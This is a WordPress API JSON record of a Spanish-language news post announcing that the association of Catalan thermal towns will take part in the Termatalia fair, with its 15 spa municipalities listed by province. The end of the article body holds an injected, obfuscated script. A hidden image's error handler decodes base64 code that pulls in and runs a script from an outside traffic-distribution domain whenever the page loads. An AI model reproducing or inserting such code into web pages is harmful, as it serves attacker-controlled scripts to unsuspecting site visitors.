{"id":5824,"date":"2022-09-22T11:16:30","date_gmt":"2022-09-22T14:16:30","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5824"},"modified":"2025-08-13T16:12:43","modified_gmt":"2025-08-13T19:12:43","slug":"viles-termales-de-catalunya-confirman-su-participacion-en-termatalia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5824","title":{"rendered":"Viles Termales de Catalunya confirman su participaci\u00f3n en Termatalia"},"content":{"rendered":"\n<h3 class=\"has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\" style=\"color:#c4cdd3\"><strong><em>Contar\u00e1n con un stand promocional y realizar\u00e1n una presentaci\u00f3n de destino termal en las jornadas t\u00e9cnicas profesionales de la feria<\/em><\/strong><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg.webp\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-1024x683.webp\" alt=\"\" class=\"wp-image-5826\" width=\"441\" height=\"294\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-1024x683.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-1068x712.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg-800x533.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/IMG_3346-1536x1024.jpg.webp 1536w\" sizes=\"(max-width: 441px) 100vw, 441px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>La Associaci\u00f3 de Viles Termals de Catalunya participar\u00e1 como expositor en Termatalia a trav\u00e9s de un stand desde el que promocionar los 15 municipios termales que la integran. Adem\u00e1s, realizar\u00e1n una presentaci\u00f3n ante profesionales y medios de comunicaci\u00f3n de una treintena de pa\u00edses que est\u00e1 incluida en el programa de jornadas t\u00e9cnicas de la feria. Esta presentaci\u00f3n titulada \u201cCatalunya Termal, Font de Vida\u201d tendr\u00e1 lugar el viernes 30 de septiembre a las 12.45 h. y correr\u00e1 a cargo de C\u00e9sar Ruiz-Canela, alcalde de Naut Aran.<\/p>\n\n\n\n<p>El termalismo en Catalunya puede definirse con la palabra \u201cdiversidad\u201d ya que es un recurso que recorre este territorio filtr\u00e1ndose por \u00e9l como lo hace el agua siguiendo su curso. \u00bfSab\u00eda que es posible darse un ba\u00f1o termal en las 4 provincias que conforman Catalu\u00f1a, y hacerlo tanto a pie de playa como a 1500m de altitud?<\/p>\n\n\n\n<p>La firme creencia en el potencial de las aguas minero-medicinales de este territorio, llev\u00f3 a la creaci\u00f3n de la Associaci\u00f3 de Viles Termals de Catalunya, un espacio com\u00fan de conocimiento y trabajo entre los distintos municipios con aguas termales para conseguir un desarrollo sostenible del termalismo en Catalu\u00f1a. Forman parte de la Asociaci\u00f3n hasta la actualidad un total de 15 municipios termales:<\/p>\n\n\n\n<p>Lleida: Baix Pallars, Les, Naut Aran y Vall de Bo\u00ed. Estos enclaves gozan de imponentes monta\u00f1as que se cubren con las mejores nieves del pa\u00eds en invierno. Adem\u00e1s, se puede disfrutar en esta zona de un balneario inscrito en el libro Guiness de los R\u00e9cords por la cantidad de fuentes que tiene.<\/p>\n\n\n\n<p>Girona: Caldes de Malavella, Santa Coloma de Farners y Sant Hilari Sacalm. En estos municipios se encuentran adem\u00e1s de varios balnearios, famos\u00edsimas embotelladoras de aguas y tambi\u00e9n el hasta ahora centro l\u00fadico y termal m\u00e1s grande de Catalunya.<\/p>\n\n\n\n<p>Tarragona: El Vendrell, Gandesa, Montbri\u00f3 del Camp y Vallfogona de Riucorb ofrecen, entre muchas otras posibilidades, la oportunidad de disfrutar de aguas minero-medicinales en plena naturaleza.<\/p>\n\n\n\n<p>Barcelona: Caldes de Montbui, Caldes d\u2019Estrac, La Garriga y Santa Coloma de Gramenet. Aqu\u00ed se encuentran surgencias de agua a m\u00e1s de 70\u00baC, de las temperaturas m\u00e1s altas de Europa. Sin lugar a dudas, remansos de paz y bienestar a menos de 1h de la ciudad Condal.<\/p>\n\n\n\n<p>Enlace de inter\u00e9s:<a href=\"http:\/\/www.catalunyatermal.cat\/\" target=\"_blank\" rel=\"noopener\">\u00a0www.catalunyatermal.cat<\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Contar\u00e1n con un stand promocional y realizar\u00e1n una presentaci\u00f3n de destino termal en las jornadas t\u00e9cnicas profesionales de la feria La Associaci\u00f3 de Viles Termals de Catalunya participar\u00e1 como expositor en Termatalia a trav\u00e9s de un stand desde el que promocionar los 15 municipios termales que la integran. Adem\u00e1s, realizar\u00e1n una presentaci\u00f3n ante profesionales y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5825,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-5824","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5824"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5824\/revisions"}],"predecessor-version":[{"id":10576,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5824\/revisions\/10576"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5825"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}